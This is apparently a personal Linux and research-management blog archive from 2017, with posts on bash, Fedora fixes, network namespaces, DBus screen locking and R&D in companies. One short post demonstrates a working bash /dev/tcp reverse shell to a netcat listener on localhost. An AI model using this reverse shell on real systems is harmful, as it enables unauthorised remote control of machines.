Wednesday, August 30, 2017

Difference between command substitution and 'while read' in bash

I just changed one of my scripts that, in principle, looked like this:
for i in `find . -type d`
do
     # do some processing on the found directory
done
The new format I use is:
find . -type d | while read i
do
    # do some processing on the found directory
done
While both versions will work in general, the second variant is better for the following reasons:
  1. It's faster. In the first case the find command has to finish before any processing of the directories starts. This isn't noticeable for small directory hierarchies, but it becomes very noticeable for large ones. In the second case, find outputs results and, in parallel, the while loop picks them up and processes them.
  2. If directory names contain embedded spaces, the second version will still work (read takes the whole line), while the first won't, because the unquoted command substitution is split on whitespace.
Maybe there are other advantages (or disadvantages) of the second version, but none come to mind at the moment. If you know of any, please write them in the comments!
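For completeness, here is a slightly more robust variant of the second form (a sketch, not part of the original script) that also survives newlines, leading whitespace and backslashes in directory names, by making find produce NUL-delimited output:
find . -type d -print0 | while IFS= read -r -d '' i
do
    # do some processing on the found directory "$i"
done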

Tuesday, August 22, 2017

Viber and Fedora 26 SSL errors

I just downloaded and updated Viber on my Fedora. When I tried to start it, it segfaulted with the following errors:
QSqlDatabasePrivate::removeDatabase: connection 'ConfigureDBConnection' is still in use, all queries will cease to work.
Qt WebEngine ICU data not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine resources not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine ICU data not found at /opt/viber/resources. Trying parent directory...
Qt WebEngine resources not found at /opt/viber/resources. Trying parent directory...
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_num_locks
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_id_callback
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_locking_callback
qt.network.ssl: QSslSocket: cannot resolve ERR_free_strings
qt.network.ssl: QSslSocket: cannot resolve EVP_CIPHER_CTX_cleanup
qt.network.ssl: QSslSocket: cannot resolve EVP_CIPHER_CTX_init
qt.network.ssl: QSslSocket: cannot resolve sk_new_null
qt.network.ssl: QSslSocket: cannot resolve sk_push
qt.network.ssl: QSslSocket: cannot resolve sk_free
qt.network.ssl: QSslSocket: cannot resolve sk_num
qt.network.ssl: QSslSocket: cannot resolve sk_pop_free
qt.network.ssl: QSslSocket: cannot resolve sk_value
qt.network.ssl: QSslSocket: cannot resolve SSL_library_init
qt.network.ssl: QSslSocket: cannot resolve SSL_load_error_strings
qt.network.ssl: QSslSocket: cannot resolve SSL_get_ex_new_index
qt.network.ssl: QSslSocket: cannot resolve SSLv23_client_method
qt.network.ssl: QSslSocket: cannot resolve SSLv23_server_method
qt.network.ssl: QSslSocket: cannot resolve X509_STORE_CTX_get_chain
qt.network.ssl: QSslSocket: cannot resolve OPENSSL_add_all_algorithms_noconf
qt.network.ssl: QSslSocket: cannot resolve OPENSSL_add_all_algorithms_conf
qt.network.ssl: QSslSocket: cannot resolve SSLeay
qt.network.ssl: QSslSocket: cannot resolve SSLeay_version
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_num_locks
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_set_id_callback
qt.network.ssl: QSslSocket: cannot call unresolved function CRYPTO_set_locking_callback
qt.network.ssl: QSslSocket: cannot call unresolved function SSL_library_init
qt.network.ssl: QSslSocket: cannot call unresolved function SSLv23_client_method
qt.network.ssl: QSslSocket: cannot call unresolved function sk_num
Segmentation fault (core dumped)
After some digging, the solution turned out to be simple: just execute the following command and Viber should work afterwards:
sudo ln -s /usr/lib64/libssl.so.10 /opt/viber/lib/libssl.so
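If you want to verify that the Viber binary now picks up the system libssl, something like the following should do (the binary path /opt/viber/Viber is my assumption; adjust it to your installation):
ldd /opt/viber/Viber | grep -i ssl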

Wednesday, July 19, 2017

When superstitions are good...

I just read the following paper:
Nunn, Nathan, and Raul Sanchez de la Sierra. Why Being Wrong can be Right: Magical Warfare Technologies and the Persistence of False Beliefs. No. w23207. National Bureau of Economic Research, 2017.
and I find it very interesting. Basically, it is about why superstitions are beneficial in certain cases. The authors analyze the case of a village in the Democratic Republic of the Congo. Due to the unstable political situation, there is a lot of violence by different armed groups that regularly attack villages. To protect themselves, people in some villages believe they can be made resistant to bullets by strictly following a special magical procedure. The belief is obviously false, but when someone dies, the death is attributed to not following the magical procedure correctly. This sounds crazy, but the effect is interesting. While it hurts individuals, it helps the collective, since more people are willing to engage in defending the village; the end result, in the specific village given as an example, was two years of peace.

The key is that an individual's utility increases when everyone contributes to defense, but decreases the more that individual himself invests. This, in effect, means that no one will invest the best they can, and thus the collective will suffer! The superstition encourages everyone to give their best, thus helping the collective. This is brilliant!

This result provokes some thinking as to whether some superstitions that I find annoying are actually beneficial, like religion for example. 

Sunday, July 16, 2017

Fedora 26 (kernel 4.11.9) and VMWare Workstation 12.5.7

I just upgraded Fedora 25 to Fedora 26 and, of course, there was a problem with VMWare Workstation. If you try to start the vmware binary, it just silently fails. Anyway, I managed to find a solution here. In essence, it is necessary to replace two shared libraries and then manually compile the vmmon and vmnet modules. The reason is that Fedora 26 uses GCC 7.1, which is newer than the compiler that was used to build VMWare. So, to replace the libraries, type:
# cp -r /usr/lib/vmware-installer/2.1.0/lib/lib/libexpat.so.0 /usr/lib/vmware/lib
# cd /usr/lib/vmware/lib/libz.so.1
# mv -i libz.so.1 libz.so.1.old
# ln -s /usr/lib64/libz.so.1 .
To compile vmmon and vmnet, you have to go into the /usr/lib/vmware/modules/source directory and unpack the vmnet.tar and vmmon.tar files. Then, in each of the unpacked directories, issue the make command. Finally, move the files ending in .ko to /lib/modules/`uname -r`/misc (create the directory if necessary) and run the 'depmod -a' command. I also had to manually load the modules with the 'modprobe vmnet' and 'modprobe vmmon' commands.
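For reference, the steps from the previous paragraph roughly translate into the following commands (a sketch, run as root at your own risk; the build normally produces vmnet.ko and vmmon.ko inside the unpacked directories):
cd /usr/lib/vmware/modules/source
tar xf vmnet.tar
tar xf vmmon.tar
make -C vmnet-only
make -C vmmon-only
mkdir -p /lib/modules/`uname -r`/misc
cp vmnet-only/vmnet.ko vmmon-only/vmmon.ko /lib/modules/`uname -r`/misc
depmod -a
modprobe vmnet
modprobe vmmon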

The only problem I have noticed so far is that, after inserting the vmnet kernel module, the virtual network interfaces are not automatically created. To fix that, just run the vmware-netcfg command and save the configuration. After that, everything should be OK.

Sunday, May 21, 2017

The role of scientific conferences in R&D

In this post I'm dealing with a very important question from the perspective of a person managing or financing R&D: how does one know how well R&D is performing? If your thought was that you'd measure it by the economic success of a product that uses the results of R&D, then you are on the wrong track. A product can be a success or a failure for a number of reasons, of which R&D is only one. So another way has to be found, and this question is actually very hard. In this post I'll try to point you to a possible solution, along with some of its negative sides. Before continuing, just to reiterate: this post is written from the perspective of a person managing or financing R&D.

The best possible solution would be that you absolutely trust all your researchers and that they produce only the best results. But this is an idealistic case: there are no perfect researchers, and even the best ones can produce mediocre results if they are under sufficiently high pressure. So some form of quality assurance is necessary.

The next best solution would be for you to check what every researcher did and evaluate it yourself; after all, whom do you trust more than yourself? But this approach also has problems, and not small ones:
  1. When a good researcher does something, the only way to track him would be to do the same things he does, and that means doing his job.
  2. Even if you knew enough to be able to analyze how someone does his or her job, that wouldn't scale.
  3. Finally, people tend to hate micromanagement, and this would be micromanagement.
So this approach wouldn't work either. Another approach would be to assign to each researcher another person who would check his work. But this has almost the same problems as doing everything by yourself. Especially problematic is potential collusion between researchers, i.e. one praises the other's work knowing that his own work will be reviewed too. In other words, reviewers might have an incentive to praise each other's work.

Thus, it is necessary to have review, but the point is for the review to be independent, done by an expert who knows the topic being reviewed and who tries to be as objective as possible. You could pay independent researchers to do reviews, but that's not how it's done. What's done instead is sending papers to scientific conferences and journals, where they are reviewed before being published. The review process is such that the authors don't know who reviewed their paper (blind review), or the reviewers don't even know whose paper they are reviewing (double-blind review). Before being published in a journal or at a conference, papers have to pass the review process, and the authors are notified about the decision along with the reviewers' comments.

So, by sending your researchers to conferences or requiring them to publish in journals, you can receive feedback about the work they have done. But there are additional benefits as well:
  1. Even if your researchers have the best intention of producing top-class results, it is good to have feedback. The reviews may contain suggestions on how to improve the work.
  2. By participating in conferences, your researchers build their professional network of people doing the same or similar things, and that might be very helpful in the long run.
  3. You should not forget the marketing aspect of scientific publications: they make you known as an organization that does research and supports its researchers, which might attract new researchers and employees.
Many companies with serious R&D do publish at scientific conferences and in journals, and they put lists of published works on their Web pages, here are some:
There are many others, and I might add more to the list later.

One very important thing before I continue. People tend to think that I'm treating publications as a goal in themselves, and thus they oppose the idea of publishing at scientific conferences. But that's not true. Publications are only a side-product of work whose goal is to produce something new that can be used to improve the company's products!

But nothing is perfect, and so this approach has some issues you have to be aware of:
  1. There are a huge number of conferences in the world, many of which are at best average. You should strive to go to the best ones, because there you'll receive the best feedback and also meet people who are more likely to be researching things that interest you. Which conferences those are depends on the specific research area and you have to search for them, but as a general rule of thumb, the lower the acceptance ratio, the better the conference.
  2. As I've said, the papers are only a side-product of the actual work done. But if too great an emphasis is put on conference/journal publication, then researchers start to optimize for that criterion instead of doing good work.
  3. You should be careful what you publish in the papers. The moment it's published, it's effectively public knowledge. This is very good from society's perspective, but it might not be so good from the perspective of the company.
  4. Publishing at a conference is not so cheap. You have to pay the conference fee, travel and accommodation expenses, and maybe a few more things. This adds up very quickly.
  5. Publication in a journal might cost nothing, but it can take time, up to 18 months. The review process for conferences is several months at most.
But in any case, I think that companies should publish as much as possible at good conferences or in good journals, as it has more benefits than drawbacks.

Thursday, May 18, 2017

What is R&D according to OECD

In my previous post I wrote my personal opinion on what R&D is. In this post I'm going to analyze the definition given by the OECD, which can be argued to be a relevant authority on such topics. For decades the OECD has produced a document called the Frascati Manual, which is about collecting and reporting data on R&D. The latest version is from 2015, and that one is used as the basis for this post. The manual, in Chapter 2, describes what R&D is. Basically, it says that the properties of an R&D activity are (paragraph 2.7):
  1. novel,
  2. creative,
  3. uncertain,
  4. systematic, and
  5. transferable and/or reproducible.
and an activity has to satisfy all of those properties to be regarded as an R&D activity.

The property of novelty can be correlated with properties 1 and 2 given in the post with my opinion. The following citations from the manual are interesting or important:
  1. In the Business enterprise sector, the potential novelty of R&D projects has to be assessed by comparison with the existing stock of knowledge in the industry. [paragraph 2.15]
  2. The R&D activity within the project must result in findings that are new to the business and not already in use in the industry. [paragraph 2.15]
Those two citations mean that if you do something that anyone already does, or that anyone can do in a relatively short period of time, then it's not a product of an R&D activity.

The property of creativity, i.e. that the results of activities are based on original, not obvious, concepts and hypotheses, can be correlated with property 2 given in the post with my opinion. The following excerpt is interesting:
An R&D project requires the contribution of a researcher!
This means that whoever is doing R&D has to have trained researchers on staff.

The property of uncertainty, i.e. that the final outcome is uncertain, has a direct relation to property 5 in my post. The difference is that the OECD publication claims that there are multiple dimensions to this property:
For R&D in general, there is uncertainty about the costs, or time, needed to achieve the expected results, as well as about whether its objectives can be achieved to any degree at all. [paragraph 2.18].
Furthermore, there is a criterion for discriminating between R&D and non-R&D activities:
Uncertainty is a key criterion when making a distinction between R&D prototyping (models used to test technical concepts and technologies with a high risk of failure, in terms of applicability) and non-R&D prototyping (preproduction units used to obtain technical or legal certifications). [paragraph 2.18]
So, the more certain you are that some functionality will end up in the final product, the less of an R&D activity it is!

The systematic property of R&D, i.e. that it is planned and budgeted, correlates with property 4 I gave in the previous post. This also includes keeping records, not only planning.

The final property, i.e. that the activity leads to results that can possibly be reproduced (transferable and/or reproducible), is the most interesting, and I didn't include it in the elaboration of my opinion. It requires that the results be published somewhere so that the conclusions can be independently verified. Somehow, it seems to me that this is the least frequently satisfied property, if nothing else because the scientific output of companies is very small. Someone could object that companies publish elsewhere, so why count only scientific output? The point is that by the expression "scientific output" I'm referring to the way the results are published, not where they are published. In other words, a scientific publication includes all the information necessary for someone else to test the results.


To conclude, let me just note that there is another important subdivision of R&D according to the OECD publication (paragraph 2.9):

  1. basic research,
  2. applied research, and
  3. experimental development.

I'll write about those in some future post.

Using astrology to protect from APTs

Probably when you saw the title, your reaction was WTF?! Using astrology for APT detection, that's totally crazy! But the sad fact is that it isn't so crazy after all, because a large number of products offered on the market claim to protect you from APTs in the same way astrology claims it can predict your future.

To elaborate this claim a bit more, the key question is: how do you know that the protection works? We can rephrase this question into another one: what process did the manufacturers use to prove, beyond reasonable doubt, that their products are capable of detecting APTs? Did they publish anywhere what they did and how? Also, since nothing is perfect, it's obvious that no solution will detect all cases. In how many cases will the products detect APTs, and again, if they provide such numbers, how did they come up with them? What is the precision, and what is the recall? None of this is published, so it is something you have to take on trust, not on numbers and experiments.

Even more, in astrology, if things turn out differently, the person doing the prediction changes the story somehow, for example claiming he or she didn't know some crucial piece of information which made the prediction wrong, or they predict in such a way that no matter what happens, it will be true. In other words, you can never falsify astrology, and that is the main reason it isn't science. But the same reasoning goes for products that protect you from APTs, too. Whether they protect you or not, you have no way of knowing whether it was pure luck or, in the case of detection, whether it was something deliberately designed into the product.

So, to conclude, I think that the majority of products for APT protection are nothing more than an application of astrology to cyber security!

Thursday, April 13, 2017

What is R&D and why should SMEs have one?

In this post I would like to describe what R&D is. This is a continuation of the more general idea of cooperation between industry, academia and government, which I wrote about in the previous post. By describing what R&D is, I also hope to answer the other part of the post's title: why SMEs should have one. In doing so, I'm not going to give formal definitions for now, only my opinion; the definitions I'll leave for another post. Before continuing, I must stress again that I'm not an expert on this subject, nor do I represent my employer. As such, this is purely my opinion, which might be completely wrong. That said, I obviously don't believe I'm wrong in general, though I accept that some ideas might not be well thought out.

I'll start by enumerating several intuitive properties I expect from R&D, looking from the perspective of a company having or wanting to have one:
  1. It adds some new value which can be monetized in some way.
  2. The new value should not be easy to obtain.
  3. It is a midterm process.
  4. It is a process that should be done methodologically with clearly defined steps and goals.
  5. There is uncertainty as to whether there will be positive results, or any results at all.
  6. It is a continuous process.
  7. R&D process requires investment.
Note that when we discuss whether something is R&D, or whether something produced is a product of R&D, we don't require that all properties hold; it is enough for a majority to hold! Now, let me discuss each property in a bit more detail.

First, there is the property that R&D adds some new value which can be monetized in some way. I think this one is obvious. Everything a company does has the goal of improving profits. Now, it would perhaps be more correct to say that everything a company does serves to fulfill its mission. This view of helping fulfill the mission actually broadens the potential topics that can be covered by R&D, since some results that don't necessarily produce money can also be covered. But, more down to earth, the company is there to make profits, and if it doesn't do that, then it ceases to exist. So R&D should support this. I will refer to R&D whose purpose is directly increasing profits as R&D in the narrower sense, while R&D in the broader sense supports the company's mission. I could theorize further that R&D in the broader sense is more expensive, with less direct ROI, and thus more suitable for large enterprises, while R&D in the narrower sense is more suitable for SMEs. Nevertheless, in the following text I'll concentrate only on R&D in the narrower sense unless I explicitly say otherwise.

The next property of R&D is that the new value produced should not be easy to obtain. In other words, if the output of some supposedly R&D activity is something that anyone can come up with immediately, then it's not the product of an R&D activity, and probably there is no R&D activity at all. This property is desirable for the simple reason that it helps the company keep its competitive edge. The more a company has something that others don't, the more competitive it is and, likely, the more successful. But there is a but. Some outputs of R&D are complex and others are deceptively simple. The advantage of having complex products is intuitively easy for anyone to understand, but the simple ones need some clarification. They are indeed simple, but the process of generating them isn't. You can find examples of such output everywhere. How many times have you learned something and your first reaction was: how did I not think of that!? Well, that's because the process to reach it is hard, but the output itself is simple. Now, it is obvious that copying simple stuff is easy, and to prevent that, the patent system was invented.

The third property is somewhat related to the previous one, i.e. R&D is a medium-term process. The reason is that a short-term process is less likely to produce something that fulfills the previous property of not-easily-replicated results, and the other properties are also harder to achieve. In other words, if you invest only a brief time into developing something, in general you can expect only simple results. On the other hand, long-term projects allow one to obtain very good, deep, well-thought-out results, but in a fast-paced world it is entirely possible that the results, once obtained, are useless. It also might happen that in the meantime, due to not having any results, the company doing R&D fails and vanishes from the market. So the key is to have a process that is long enough to produce useful results, but not so long that the results become useless. Finding the sweet spot is more of an art than a science.

The fourth property, that the R&D process should be done methodologically with clearly defined steps and goals, basically means that certain steps have to be present. For example, goals or requirements must be defined in order to be able to assess whether the result meets the goals set at the beginning. Then there has to be an exploratory step of studying existing work; repeating what has already been done is definitely not something that leads to good R&D, or to R&D at all. If nothing else, where is the added value required by one of the previous properties? Even worse, it might happen that the results obtained are worse than what others have already achieved, and potentially useless. After all, the current state of the art was reached through a lot of investment, in terms of time and money. Not to mention that there is a problem with patents: it doesn't matter whether you copied something or invented it on your own. If it is patented, you cannot use it without the consent of the patent holder! To continue with the steps that should be present in an R&D activity, we also have to mention the evaluation of proposed solutions. It is mandatory. It can be done by experiments, simulations, etc. The evaluation must be done in a rigorous way, so that it is beyond reasonable doubt that the proposed solutions do indeed lead to better results. I'll stop here because I intend to write more about this topic in a separate post that deals with the issue of how to establish R&D.

The fifth property is uncertainty as to whether there will be positive results, or any results at all. There is a reason why it is called research and development; if it were not so, it would be engineering. Note that people sometimes mistakenly confuse the uncertainty of building a new product that could fail on the market with the uncertainty of research results. The two are independent and might interplay in several ways. What we are talking about here is that, when doing R&D, it might happen that the ideas or goals turn out not to be feasible. But this has nothing to do with whether, if the ideas and goals are feasible, they will be successful on the market or not. Take for example the idea of a system that would allow the replacement of programmers. This goal isn't achievable, and no R&D activity would be able to produce something like that. But if it were achievable, it would certainly be a huge commercial success. So, care should be taken not to confuse the uncertainty of research results with the uncertainty of market success.

Finally, the sixth property, the continuity of the R&D process, is something that should be satisfied in order for R&D to be useful. This follows from the ever-changing environment and improving competition. If a company does one-shot R&D, this could help the company in the short run, but in the long run there will be no benefit from having R&D. So, just as a company has to continuously adapt to the state of the environment, R&D has to be there to support the necessary changes. There is also one additional reason for a continuous R&D process: it is rather expensive to establish, so the payoff is better if R&D is established and allowed to function continuously.

I added the seventh property later, after a colleague of mine read the post and commented that the R&D process is expensive. After some thought, I decided to rephrase it differently, namely that the R&D process requires investment. I'm still not certain whether this should be a separate property or not, because I believe it is implied by the combination of the previous properties. In the end, I decided to list it as a separate property, just in case. I should clarify it a bit. Everything is expensive when we talk about activities in a company, but the cost is usually outweighed by earnings which are immediate, either direct (e.g. selling a product to a customer) or indirect (e.g. bookkeeping activities). R&D is different in two aspects. First, it requires investment with returns coming only later and in the long run, if there is a result from R&D at all (property 5).

In conclusion, I listed six (seven) properties that can be used to determine whether a company is doing R&D or merely has something it thinks is R&D. Those are probably not the only properties, and if you have any to add (or you think that some of those listed above are not important), please comment and provide your arguments. Probably not all of the listed properties will be present in many cases of company R&D, but as I said in the introduction, a majority will do. Maybe we can also talk about R&D maturity, i.e. the more properties are present, the more mature the process is. But I'll leave that for another post.


Wednesday, April 5, 2017

Cooperation between industry, academia and government

This is the first in a series of posts (I hope) that will deal with research and development in small and medium enterprises. The reason I'm interested in this topic will become clear after I describe a bit how I got into it. Before I start, let me clearly state that I'm not an expert in economics, management, or even the question of what science is. Everything I say is my personal view at the moment of writing and has nothing to do with anyone else. In particular, it is not the official position of my Faculty or University.

I work at the Faculty of Electrical Engineering, University of Zagreb. My firm belief is that no university can be successful in the long run without being part of a prosperous environment. The reverse also holds, i.e. a local economy cannot be competitive and successful without the support of good universities and colleges. To give an example that supports this view: Stanford wouldn't be what it is without the brilliant leadership of Fred Terman, whose vision helped create Silicon Valley. In essence, he created a successful local environment that helped Stanford, and the circle was closed.

Yes, we live in a global, highly connected world, and any student can work wherever she or he wants; the same goes for me. Furthermore, anyone can come to Croatia and work here, at least in principle. I can also cooperate with anyone I wish in the world. After all, exactly that is supported by the EU through different programs, most notably Horizon 2020, which encourages EU companies and universities to cooperate. This is good, and necessary, but it is not so perfect for one simple reason, and that is the question of who is paying me, and who is paying for the education of the students coming to my university? The answer isn't so global; it is actually very local. All of that is paid for by taxpayers in Croatia, and the taxpayers are individuals and companies living and existing in Croatia!

With all that said, I think it is very important for the local economy to grow, and I must do as much as I can to help local companies grow and develop, for mutual benefit. More importantly, I think that everyone in Croatia, working in companies or at universities, has to see things this way.

Now we come to the question of how to help. The answer is actually quite straightforward: I should do what I'm supposed to do at the University, i.e. research. Companies should cooperate with and contract universities for research in order to become more efficient and to have better and more competitive products and services. The truth is that not many companies have enough resources for research and development; it is a risky and expensive endeavor. So companies should rely on the University and on EU funding: the University provides research resources, and the EU, with its funding, takes on a part of the risk. Of all the funding available, I'll concentrate on one specific instrument that supports Smart specialization, for several reasons:
  1. I was directly involved in one segment of its preparation.
  2. I'm involved in applications for several projects.
  3. It tries to connect universities and commercial sector.
  4. It isn't meant for large pan-European projects, but projects within a single country. 
Three years ago I was involved in the development of the Smart specialization strategy (S3) of the Republic of Croatia. The involvement lasted for about two years, a bit less. Smart specialization is actually something defined by the European Commission, which stated that each country (or region) has to specialize in something in order for the EU to be competitive on the global market in the long term. Of course, the specialization has to be supported by the current economy, and obviously, it has to be focused. Now, I'm not aware of what other countries did, nor did I spend too much time searching around, so what I'm going to write is probably specific to Croatia, and even more specifically to cyber security (one of the subareas selected for specialization in Croatia is cyber security, which is where most of my work is done). One of the goals of S3 is to encourage the commercial, academic and government sectors to cooperate. This should in turn make the commercial sector more competitive.

I'm somehow under the impression that S3 was talked about a lot while it was being developed, but now that the strategy is defined and has to be implemented, there are not so many events, if any at all (apart from the Ministry of Commerce, which actually handles all activities related to S3). For example, I'm not aware of a single round table, workshop, conference or anything else organized around S3: how it is progressing, whether we have learnt something, what could be done better, etc.

In the following posts I want to delve more into the following very important topics:
  1. What is R&D and why should SMEs have one?
  2. How to have R&D?
  3. How to get ideas on what to R&D?
  4. How I think companies behave with respect to S3, and in general towards EU projects.

Monday, April 3, 2017

How to run Firefox in a separate network name space

In this post I'll explain how to run Firefox (or any other application) in a separate network namespace. If you wonder why you would do that, here are some reasons:
  1. You connect to a VPN and want a single application to connect via the VPN. All the other applications should access the network as usual.
  2. You want to know what network resources a specific application accesses. For example, there is a JavaScript application that runs within the Web browser and you want to monitor it at the network level.
  3. You want to temporarily use another IP address, but at the same time keep the existing network configuration, because some applications use it and wouldn't react well to the change.
  4. You have an alternative connection to the Internet (e.g. one via a wired interface, and another via LTE) and you want some applications to use LTE, the default being the wired interface. This is actually a variation of cases 1 and 3, but obviously it's not the same.
There are probably other reasons too, but I think this is enough to persuade you of the advantages of using network namespaces on Linux. Note that you can run two instances of Firefox at the same time: one "normal" instance in the "normal" network namespace, and another in the new and potentially restricted network namespace. More on that later in the post.

So, here is how to create a new network namespace with network interface(s). Note that there are several different cases, depending on how you connect to the Internet and what you want to achieve, so there will be several subcases. But first, create a new network namespace using the following command (as the root user):
# ip netns add <NSNAME>
NSNAME will be the name of the network namespace. You should use something short and meaningful, i.e. something that will remind you what the namespace is used for. You can check that the namespace exists using the following command:
# ip netns list
From this point on we have two subcases:
  • You are connected using a wired Ethernet interface and you can attach new machines to the Ethernet network.
  • You are connected to the Internet using a wireless interface, or you are connected to a wired Ethernet interface but are not allowed to attach new machines.
Both cases are described in the following subsections.

Wired Ethernet interface

This is the easiest case, and there are several options you can use. We'll use the macvlan interface type, which creates a clone of an existing wired Ethernet interface that appears on the physical network with its own parameters. This is, in effect, like attaching a new host to the local network. Note that if you are not allowed to connect new devices to the network, you should use the routing method described for the wireless interface.

The first step is to create a new interface:
# ip link add link <ETHIF> name <IFNAME> type macvlan
The parameters are: ETHIF is your existing Ethernet interface, while IFNAME is a new interface that will be created. You should then move the interface into the target network namespace (we assume here that you want to move it to NSNAME):
# ip link set <IFNAME> netns <NSNAME>
and then you have to activate it:
# ip netns exec <NSNAME> ip link set <IFNAME> up
Note that the activation has to be done using "ip netns exec", since to access the network interface you have to switch to the network namespace where the interface is! What is left is to assign it an IP address. This can be done statically or via DHCP, for example as shown below.
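For example, a static assignment could look like this (a sketch; the address 192.168.1.50/24 and the gateway 192.168.1.1 are placeholders for your network):
# ip netns exec <NSNAME> ip addr add 192.168.1.50/24 dev <IFNAME>
# ip netns exec <NSNAME> ip route add default via 192.168.1.1
or, if you have a DHCP client such as dhclient available, something like:
# ip netns exec <NSNAME> dhclient <IFNAME>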

Now that the network part is ready, skip to the section Starting Firefox.

Wireless LAN

In case you are connected to a wireless LAN, the macvlan link type will not work, so another mechanism is necessary. There are two options: bridging and routing. The problem with bridging is that you have to bring the wireless interface down before enslaving it into a bridge. That creates two problems: all current TCP connections will break, and it doesn't play nicely with NetworkManager and similar software. Thus, I'll describe the routing case.

First, create a pair of virtual Ethernet interfaces like this:
ip link add type veth
This will create two new interfaces veth0 and veth1. Those interfaces are actually two ends of a single link. We'll move one interface into another network namespace:
ip link set veth1 netns <NSNAME>
Next we'll configure interfaces with IP addresses. I'll use 10.255.255.1/24 for the interface that's left in the main network namespace (veth0) and 10.255.255.2/24 for the interface in the NSNAME network name space (veth1):
# ip addr add 10.255.255.1/24 dev veth0
# ip link set dev veth0 up
# ip netns exec <NSNAME> ip addr add 10.255.255.2/24 dev veth1
# ip netns exec <NSNAME> ip link set dev veth1 up
# ip netns exec <NSNAME> ip ro add default via 10.255.255.1
We also need to configure NAT, because the network 10.255.255.0/24 is only used for communication between the two network namespaces and its addresses should not appear outside the host computer:
# iptables -A POSTROUTING -t nat -o wlp3s0 -s 10.255.255.2 -j MASQUERADE
Replace wlp3s0 with the name of your wireless interface. In case it doesn't work, check two things:
  1. Forwarding has to be enabled. This is checked/set via /proc/sys/net/ipv4/ip_forward (it should contain 1); see the commands after this list.
  2. Maybe your host has a firewall that blocks the traffic. To check whether that's the problem, temporarily disable the firewall and try again. Note that disabling the firewall will most likely remove the iptables rule you added, so you'll have to add it again.
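To check and, if needed, enable forwarding, the following should be enough (standard commands, shown here just for convenience):
# cat /proc/sys/net/ipv4/ip_forward
# sysctl -w net.ipv4.ip_forward=1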

Starting Firefox

Now that you have created the interface within the new network namespace, to start Firefox (or any other application) in it, you first have to switch into the new namespace. Do this in the following way:
# ip netns exec <NSNAME> bash
Note that it is important to do it this way in order to preserve the environment variables; if you do "su -" or something similar, you'll reset the environment and you won't be able to start graphical applications. After you get a bash shell as root, switch back to the "normal" user:
su <userid>
Again, it is very important to preserve the network namespace, so you have to use the su command as shown. Obviously, substitute userid with the user logged into the graphical interface. Next, start Firefox:
$ firefox &
In case you already have a running instance of Firefox that, for whatever reason, you don't want to stop, you can start a new instance like this:
$ firefox -P -no-remote &
This will start a new instance even though there is a running Firefox process (-no-remote) and present you with a dialog box to choose a profile to run with (-P). You cannot use the existing profile, which means you have to create a new one specially for this purpose. The drawback is that your bookmarks, cookies and other things won't be visible in the new instance.
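If you prefer to skip the profile selection dialog, you can also create a dedicated profile up front and start it by name (a sketch; the profile name netns is arbitrary):
$ firefox -CreateProfile netns
$ firefox -P netns -no-remote &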

Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get a reverse remote shell. I say reverse because the remote system connects to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This will start netcat, which will listen on port 12345. Then, in a second terminal, run the following command:
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'
You won't notice anything in the first window where the nc command is running, but try entering some command there, e.g. pwd. :) What you've got is a remote shell. Obviously, because of the way things work you don't get a prompt and other fancy stuff, but it works and that's what matters. :)

What you basically did is run an interactive bash process (the -i option) with standard output and standard error redirected to /dev/tcp/127.0.0.1/12345 (the >& redirection operator), and with standard input also redirected from the same connection (the final 0>&1). The "file" being redirected to and from is special notation that the bash shell turns into a network connection, i.e. the syntax is:
/dev/<protocol>/<ipaddress>/<port>
More details can be found in the bash manual page.
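As a side note, the same notation can be (ab)used for a quick TCP port check directly from bash (a sketch; note that this is a bash feature, it won't work in plain sh):
$ (echo > /dev/tcp/<ipaddress>/<port>) 2>/dev/null && echo open || echo closed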

Saturday, February 25, 2017

Lock remote desktop over SSH

I had a seemingly simple problem: connect over SSH to a remote computer and lock its screen. A simple Google search for "gnome lock screen" yielded plenty of results, all of which revolve around using the command gnome-screensaver-command -l. First off, the gnome-screensaver package isn't installed by default on Fedora, meaning it isn't used there. Then, after installing it, I got the following error message:
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=062fabbac04041679f56c8db8593c352 --binary-syntax --close-stderr': Child process exited with code 1
OK, it turns out that the session DBus is inaccessible and that gnome-screensaver-command just sends a message over DBus. Using d-feet it was easy to find the object, interface and method to use to lock the screen, but figuring out how to access DBus was a bit harder. The easy part was finding out that the key is the environment variable DBUS_SESSION_BUS_ADDRESS, which has to point to the DBus daemon socket. The harder part was finding where this socket is, since it isn't in the usual places on the file system. In the end, it turned out that the easiest way is to look at the environment of an existing process and get the value from there, i.e.:
$ cat /proc/`pidof gnome-shell`/environ | \
              tr '\0' '\n' | grep DBUS_SESSION_BUS_ADDRESS
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-dl1GC6PYCt,guid=33abd4a9e6bb3dee9262121d5819bdf1
The tr command is necessary because entries in the environment are separated by the NUL character (i.e. they are C strings), so we change each separator into a newline. Finally, grep just picks out the entry we are interested in. BTW, sorry for the useless use of cat, but it is a leftover from how I constructed the command. :)

When you have properly set the environment variable to access DBus, it is easy to invoke the Lock() method that locks the screen, i.e.:
dbus-send --print-reply --session \
          --type=method_call --reply-timeout=3000 \
          --dest='org.gnome.ScreenSaver' \
          /org/gnome/ScreenSaver \
          org.gnome.ScreenSaver.Lock
and that will lock the screen. What's left to do is just to glue everything into a script:
#!/bin/bash
PID=`pidof gnome-shell`
DBUS_SESSION_BUS_ADDRESS=$(tr '\0' '\n' < /proc/${PID}/environ | grep "DBUS_SESSION_BUS_ADDRESS" | cut -d "=" -f 2-) \
dbus-send --print-reply --session --type=method_call --reply-timeout=3000 --dest='org.gnome.ScreenSaver' /org/gnome/ScreenSaver org.gnome.ScreenSaver.Lock
Just copy that into a file, make it executable and try it. It should work every time. :)
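Assuming you saved the script on the remote machine as, say, lock-screen.sh (the name and location are arbitrary, my choice), locking the remote desktop over SSH then boils down to:
$ ssh <userid>@<remotehost> ./lock-screen.sh
where <userid> is the user logged into the graphical session on the remote machine.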

Monday, January 30, 2017

Fedora 25, kernel 4.9 and VMWare Workstation 12.5.2

